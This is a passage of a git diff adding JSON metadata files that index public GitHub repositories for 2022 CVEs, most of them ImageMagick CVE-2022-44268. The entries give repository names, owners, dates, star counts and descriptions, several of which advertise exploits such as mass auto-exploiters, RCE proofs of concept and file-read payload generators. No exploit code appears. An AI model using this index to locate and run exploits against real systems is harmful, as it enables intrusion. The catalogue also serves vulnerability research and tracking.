"https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2022-43571", + "description": null, + "fork": false, + "created_at": "2022-12-27T08:00:44Z", + "updated_at": "2022-12-27T08:00:44Z", + "pushed_at": "2022-12-27T08:01:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43680.json b/2022/CVE-2022-43680.json new file mode 100644 index 0000000000..94e8532999 --- /dev/null +++ b/2022/CVE-2022-43680.json @@ -0,0 +1,64 @@ +[ + { + "id": 578580664, + "name": "external_expat-2.1.0_CVE-2022-43680", + "full_name": "Trinadh465\/external_expat-2.1.0_CVE-2022-43680", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_expat-2.1.0_CVE-2022-43680", + "description": null, + "fork": false, + "created_at": "2022-12-15T11:52:14Z", + "updated_at": "2023-12-18T19:22:49Z", + "pushed_at": "2022-12-15T12:21:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 579853949, + "name": "external_expat_2.1.0_CVE-2022-43680", + "full_name": "nidhihcl\/external_expat_2.1.0_CVE-2022-43680", + "owner": { + "login": "nidhihcl", + "id": 121002296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121002296?v=4", + "html_url": "https:\/\/github.com\/nidhihcl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl\/external_expat_2.1.0_CVE-2022-43680", + "description": null, + "fork": false, + "created_at": "2022-12-19T05:09:12Z", + "updated_at": "2022-12-19T05:25:40Z", + "pushed_at": "2022-12-19T05:26:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43704.json b/2022/CVE-2022-43704.json new file mode 100644 index 0000000000..9f9289e8d5 --- /dev/null +++ b/2022/CVE-2022-43704.json @@ -0,0 +1,33 @@ +[ + { + "id": 531025997, + "name": "CVE-2022-43704", + "full_name": "9lyph\/CVE-2022-43704", + "owner": { + "login": "9lyph", + "id": 44860700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44860700?v=4", + "html_url": "https:\/\/github.com\/9lyph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9lyph\/CVE-2022-43704", + "description": "Sinilink XY-WFTX Wifi Remote Thermostat Module Temperature Controller", + "fork": false, + "created_at": "2022-08-31T10:00:09Z", + "updated_at": "2024-10-04T02:48:39Z", + "pushed_at": "2024-10-04T02:48:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4395.json b/2022/CVE-2022-4395.json new file mode 100644 index 0000000000..9027dcdfce --- /dev/null +++ b/2022/CVE-2022-4395.json @@ -0,0 +1,33 @@ +[ + { + "id": 611731156, + "name": "CVE-2022-4395", + "full_name": "MrG3P5\/CVE-2022-4395", + "owner": { + "login": "MrG3P5", + "id": 57594747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57594747?v=4", + "html_url": "https:\/\/github.com\/MrG3P5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrG3P5\/CVE-2022-4395", + "description": "Mass Auto Exploit CVE-2022-4395 Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2023-03-09T12:35:48Z", + "updated_at": "2024-02-21T18:34:48Z", + "pushed_at": "2023-03-09T12:46:45Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43959.json b/2022/CVE-2022-43959.json new file mode 100644 index 0000000000..982a13f486 --- /dev/null +++ b/2022/CVE-2022-43959.json @@ -0,0 +1,33 @@ +[ + { + "id": 558768361, + "name": "CVE-2022-43959", + "full_name": "secware-ru\/CVE-2022-43959", + "owner": { + "login": "secware-ru", + "id": 116876868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116876868?v=4", + "html_url": "https:\/\/github.com\/secware-ru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secware-ru\/CVE-2022-43959", + "description": "Bitrix Vulnerability CVE-2022-43959", + "fork": false, + "created_at": "2022-10-28T08:52:17Z", + "updated_at": "2024-07-08T21:00:34Z", + "pushed_at": "2023-03-18T10:34:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43980.json b/2022/CVE-2022-43980.json new file mode 100644 index 0000000000..567f9db358 --- /dev/null +++ b/2022/CVE-2022-43980.json @@ -0,0 +1,33 @@ +[ + { + "id": 602645546, + "name": "CVE-2022-43980", + "full_name": "Argonx21\/CVE-2022-43980", + "owner": { + "login": "Argonx21", + "id": 30073895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073895?v=4", + "html_url": "https:\/\/github.com\/Argonx21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Argonx21\/CVE-2022-43980", + "description": "Stored Cross Site Scripting Vulnerability in the network maps edit functionality", + "fork": false, + "created_at": "2023-02-16T16:42:12Z", + "updated_at": "2023-02-16T16:42:12Z", + "pushed_at": "2023-02-16T17:03:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44118.json b/2022/CVE-2022-44118.json new file mode 100644 index 0000000000..60caf527e4 --- /dev/null +++ b/2022/CVE-2022-44118.json @@ -0,0 +1,33 @@ +[ + { + "id": 600342998, + "name": "CVE-2022-44118-Exploit", + "full_name": "Athishpranav2003\/CVE-2022-44118-Exploit", + "owner": { + "login": "Athishpranav2003", + "id": 105591739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105591739?v=4", + "html_url": "https:\/\/github.com\/Athishpranav2003", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Athishpranav2003\/CVE-2022-44118-Exploit", + "description": "PoC Exploit for RCE vulnerability in DedeCMS v6.1.9", + "fork": false, + "created_at": "2023-02-11T07:29:08Z", + "updated_at": "2023-02-11T07:30:47Z", + "pushed_at": "2023-07-04T07:17:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44136.json b/2022/CVE-2022-44136.json new file mode 100644 index 0000000000..b98cb4ae44 --- /dev/null +++ b/2022/CVE-2022-44136.json @@ -0,0 +1,33 @@ +[ + { + "id": 653887200, + "name": "CVE-2022-44136-exploit", + "full_name": "IgorDuino\/CVE-2022-44136-exploit", + "owner": { + "login": "IgorDuino", + "id": 74809945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74809945?v=4", + "html_url": "https:\/\/github.com\/IgorDuino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IgorDuino\/CVE-2022-44136-exploit", + "description": "Exploit for CVE-2022-44136 for chcking security of your site", + "fork": false, + "created_at": "2023-06-15T00:52:11Z", + "updated_at": "2023-06-15T00:52:11Z", + "pushed_at": "2023-06-15T00:52:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44149.json b/2022/CVE-2022-44149.json new file mode 100644 index 0000000000..5a61443604 --- /dev/null +++ b/2022/CVE-2022-44149.json @@ -0,0 +1,79 @@ +[ + { + "id": 586048910, + "name": "CVE-2022-44149", + "full_name": "yerodin\/CVE-2022-44149", + "owner": { + "login": "yerodin", + "id": 9205071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4", + "html_url": "https:\/\/github.com\/yerodin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-44149", + "description": "POC Exploit for CVE-2022-44149", + "fork": false, + "created_at": "2023-01-06T20:00:25Z", + "updated_at": "2023-01-07T17:03:57Z", + "pushed_at": "2023-01-25T03:08:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840469662, + "name": "CVE-2022-44149", + "full_name": "geniuszlyy\/CVE-2022-44149", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2022-44149", + "description": "it is script designed to interact with a router by sending a payload to its system tools. The script retrieves the router's configuration from environment variables to ensure security. It includes functions for generating an authorization header, sending a payload, and logging the process.", + "fork": false, + "created_at": "2024-08-09T19:27:22Z", + "updated_at": "2024-10-06T16:41:28Z", + "pushed_at": "2024-08-09T19:28:51Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-44149", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "payload", + "penetration-testing", + "poc", + "privilege-escalation", + "security", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44183.json b/2022/CVE-2022-44183.json new file mode 100644 index 0000000000..725b786831 --- /dev/null +++ b/2022/CVE-2022-44183.json @@ -0,0 +1,33 @@ +[ + { + "id": 581552187, + "name": "CVE-2022-44183", + "full_name": "flagqaz\/CVE-2022-44183", + "owner": { + "login": "flagqaz", + "id": 96327717, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96327717?v=4", + "html_url": "https:\/\/github.com\/flagqaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flagqaz\/CVE-2022-44183", + "description": "This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44183 Made by Sn0wAlice. ❤️", + "fork": false, + "created_at": "2022-12-23T14:24:28Z", + "updated_at": "2022-12-26T18:40:13Z", + "pushed_at": "2022-12-23T14:21:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44215.json b/2022/CVE-2022-44215.json new file mode 100644 index 0000000000..64aa8a687e --- /dev/null +++ b/2022/CVE-2022-44215.json @@ -0,0 +1,33 @@ +[ + { + "id": 579926041, + "name": "CVE-2022-44215", + "full_name": "JBalanza\/CVE-2022-44215", + "owner": { + "login": "JBalanza", + "id": 31896165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31896165?v=4", + "html_url": "https:\/\/github.com\/JBalanza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JBalanza\/CVE-2022-44215", + "description": "Public disclosure of TitanFTP 19.X Open Redirection vulnerability", + "fork": false, + "created_at": "2022-12-19T09:34:49Z", + "updated_at": "2024-03-27T20:36:30Z", + "pushed_at": "2022-12-19T11:53:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44268.json b/2022/CVE-2022-44268.json new file mode 100644 index 0000000000..e3e076939e --- /dev/null +++ b/2022/CVE-2022-44268.json @@ -0,0 +1,804 @@ +[ + { + "id": 596623131, + "name": "CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC", + "full_name": "duc-nt\/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC", + "owner": { + "login": "duc-nt", + "id": 61867814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61867814?v=4", + "html_url": "https:\/\/github.com\/duc-nt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duc-nt\/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC", + "description": "CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator", + "fork": false, + "created_at": "2023-02-02T15:34:28Z", + "updated_at": "2024-09-04T03:30:25Z", + "pushed_at": "2023-02-02T16:53:37Z", + "stargazers_count": 270, + "watchers_count": 270, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 40, + "watchers": 270, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 596917149, + "name": "CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment", + "full_name": "y1nglamore\/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment", + "owner": { + "login": "y1nglamore", + "id": 46070281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46070281?v=4", + "html_url": "https:\/\/github.com\/y1nglamore", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/y1nglamore\/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment", + "description": "The vulnerable recurrence docker environment for CVE-2022-44268", + "fork": false, + "created_at": "2023-02-03T08:02:28Z", + "updated_at": "2023-05-30T06:56:16Z", + "pushed_at": "2023-02-03T08:03:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 597160092, + "name": "cve-2022-44268", + "full_name": "agathanon\/cve-2022-44268", + "owner": { + "login": "agathanon", + "id": 88989307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88989307?v=4", + "html_url": "https:\/\/github.com\/agathanon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/agathanon\/cve-2022-44268", + "description": "Payload generator and extractor for CVE-2022-44268 written in Python.", + "fork": false, + "created_at": "2023-02-03T19:02:27Z", + "updated_at": "2023-11-07T11:34:49Z", + "pushed_at": "2023-02-03T21:19:31Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 597257490, + "name": "cve-2022-44268-detector", + "full_name": "jnschaeffer\/cve-2022-44268-detector", + "owner": { + "login": "jnschaeffer", + "id": 1588395, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1588395?v=4", + "html_url": "https:\/\/github.com\/jnschaeffer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jnschaeffer\/cve-2022-44268-detector", + "description": "Detect images that likely exploit CVE-2022-44268", + "fork": false, + "created_at": "2023-02-04T01:35:08Z", + "updated_at": "2024-01-14T12:48:26Z", + "pushed_at": "2023-12-06T14:25:00Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-44268", + "imagemagick" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 597283448, + "name": "CVE-2022-44268-automated-poc", + "full_name": "Ashifcoder\/CVE-2022-44268-automated-poc", + "owner": { + "login": "Ashifcoder", + "id": 46344066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46344066?v=4", + "html_url": "https:\/\/github.com\/Ashifcoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ashifcoder\/CVE-2022-44268-automated-poc", + "description": "An information disclosure vulnerability that could be exploited to read arbitrary files from a server when parsing an image in Image Magic.", + "fork": false, + "created_at": "2023-02-04T03:50:07Z", + "updated_at": "2024-03-01T08:40:03Z", + "pushed_at": "2023-02-04T03:50:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 597372793, + "name": "CVE-2022-44268-PoC", + "full_name": "Baikuya\/CVE-2022-44268-PoC", + "owner": { + "login": "Baikuya", + "id": 52155445, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52155445?v=4", + "html_url": "https:\/\/github.com\/Baikuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Baikuya\/CVE-2022-44268-PoC", + "description": "CVE-2022-44268 PoC", + "fork": false, + "created_at": "2023-02-04T10:50:20Z", + "updated_at": "2023-07-16T11:02:28Z", + "pushed_at": "2023-02-04T11:01:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 597824177, + "name": "CVE-2022-44268", + "full_name": "voidz0r\/CVE-2022-44268", + "owner": { + "login": "voidz0r", + "id": 1032286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1032286?v=4", + "html_url": "https:\/\/github.com\/voidz0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/voidz0r\/CVE-2022-44268", + "description": "A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read", + "fork": false, + "created_at": "2023-02-05T18:42:27Z", + "updated_at": "2024-11-08T18:57:59Z", + "pushed_at": "2023-02-05T19:35:03Z", + "stargazers_count": 215, + "watchers_count": 215, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 215, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 598074036, + "name": "imagemagick-lfi-poc", + "full_name": "Sybil-Scan\/imagemagick-lfi-poc", + "owner": { + "login": "Sybil-Scan", + "id": 121743489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121743489?v=4", + "html_url": "https:\/\/github.com\/Sybil-Scan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sybil-Scan\/imagemagick-lfi-poc", + "description": "ImageMagick LFI PoC [CVE-2022-44268]", + "fork": false, + "created_at": "2023-02-06T10:44:43Z", + "updated_at": "2024-10-15T02:57:20Z", + "pushed_at": "2023-11-06T00:38:18Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-44268", + "imagemagick", + "lfi" + ], + "visibility": "public", + "forks": 11, + "watchers": 52, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 598074392, + "name": "imagemagick-CVE-2022-44268", + "full_name": "Vulnmachines\/imagemagick-CVE-2022-44268", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/imagemagick-CVE-2022-44268", + "description": "Imagemagick CVE-2022-44268", + "fork": false, + "created_at": "2023-02-06T10:45:42Z", + "updated_at": "2024-11-13T20:59:34Z", + "pushed_at": "2023-02-06T10:51:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 600932755, + "name": "CVE-2022-44268", + "full_name": "kljunowsky\/CVE-2022-44268", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-44268", + "description": "CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit", + "fork": false, + "created_at": "2023-02-13T02:00:51Z", + "updated_at": "2024-10-28T05:08:08Z", + "pushed_at": "2023-12-29T14:53:55Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "applicati", + "bugbounty", + "bugbounty-tool", + "bugbountytips", + "cve-2022-44268", + "exploit", + "penetration-testing", + "penetration-testing-tools", + "proof-of-concept", + "security", + "web", + "webapplicationhacking" + ], + "visibility": "public", + "forks": 7, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604397718, + "name": "heroku-CVE-2022-44268-reproduction", + "full_name": "nfm\/heroku-CVE-2022-44268-reproduction", + "owner": { + "login": "nfm", + "id": 127960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127960?v=4", + "html_url": "https:\/\/github.com\/nfm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nfm\/heroku-CVE-2022-44268-reproduction", + "description": null, + "fork": false, + "created_at": "2023-02-21T01:15:07Z", + "updated_at": "2023-02-21T02:02:09Z", + "pushed_at": "2023-02-21T04:03:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 617667621, + "name": "POC-CVE-2022-44268", + "full_name": "betillogalvanfbc\/POC-CVE-2022-44268", + "owner": { + "login": "betillogalvanfbc", + "id": 45644724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45644724?v=4", + "html_url": "https:\/\/github.com\/betillogalvanfbc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/betillogalvanfbc\/POC-CVE-2022-44268", + "description": null, + "fork": false, + "created_at": "2023-03-22T21:26:20Z", + "updated_at": "2023-03-23T05:43:33Z", + "pushed_at": "2023-03-22T21:26:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 658471431, + "name": "CVE-2022-44268-MagiLeak", + "full_name": "adhikara13\/CVE-2022-44268-MagiLeak", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2022-44268-MagiLeak", + "description": "Tools for working with ImageMagick to handle arbitrary file read vulnerabilities. Generate, read, and apply profile information to PNG files using a command-line interface.", + "fork": false, + "created_at": "2023-06-25T20:52:57Z", + "updated_at": "2023-06-27T09:57:01Z", + "pushed_at": "2023-06-26T18:16:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 661387078, + "name": "CVE-2022-44268-Exploit", + "full_name": "bhavikmalhotra\/CVE-2022-44268-Exploit", + "owner": { + "login": "bhavikmalhotra", + "id": 65305368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65305368?v=4", + "html_url": "https:\/\/github.com\/bhavikmalhotra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bhavikmalhotra\/CVE-2022-44268-Exploit", + "description": "Expoit for CVE-2022-44268", + "fork": false, + "created_at": "2023-07-02T17:24:00Z", + "updated_at": "2023-07-02T18:46:00Z", + "pushed_at": "2023-07-02T17:28:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 661819238, + "name": "CVE-2022-44268", + "full_name": "entr0pie\/CVE-2022-44268", + "owner": { + "login": "entr0pie", + "id": 73120825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73120825?v=4", + "html_url": "https:\/\/github.com\/entr0pie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/entr0pie\/CVE-2022-44268", + "description": "PoC of Imagemagick's Arbitrary File Read", + "fork": false, + "created_at": "2023-07-03T18:13:44Z", + "updated_at": "2024-07-21T00:04:34Z", + "pushed_at": "2023-07-03T18:34:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 666508345, + "name": "cve-2022-44268", + "full_name": "Pog-Frog\/cve-2022-44268", + "owner": { + "login": "Pog-Frog", + "id": 60003686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60003686?v=4", + "html_url": "https:\/\/github.com\/Pog-Frog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pog-Frog\/cve-2022-44268", + "description": null, + "fork": false, + "created_at": "2023-07-14T17:46:15Z", + "updated_at": "2023-07-14T17:46:23Z", + "pushed_at": "2023-07-14T17:46:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667601703, + "name": "auto-cve-2022-44268.sh", + "full_name": "narekkay\/auto-cve-2022-44268.sh", + "owner": { + "login": "narekkay", + "id": 24856100, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24856100?v=4", + "html_url": "https:\/\/github.com\/narekkay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/narekkay\/auto-cve-2022-44268.sh", + "description": "Automating Exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read", + "fork": false, + "created_at": "2023-07-17T22:21:33Z", + "updated_at": "2024-07-10T02:01:58Z", + "pushed_at": "2023-07-18T01:11:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 669707422, + "name": "ImageMagick-lfi-poc", + "full_name": "fanbyprinciple\/ImageMagick-lfi-poc", + "owner": { + "login": "fanbyprinciple", + "id": 29324589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29324589?v=4", + "html_url": "https:\/\/github.com\/fanbyprinciple", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fanbyprinciple\/ImageMagick-lfi-poc", + "description": "ImageMagick Arbitrary Read Files - CVE-2022-44268", + "fork": false, + "created_at": "2023-07-23T06:56:59Z", + 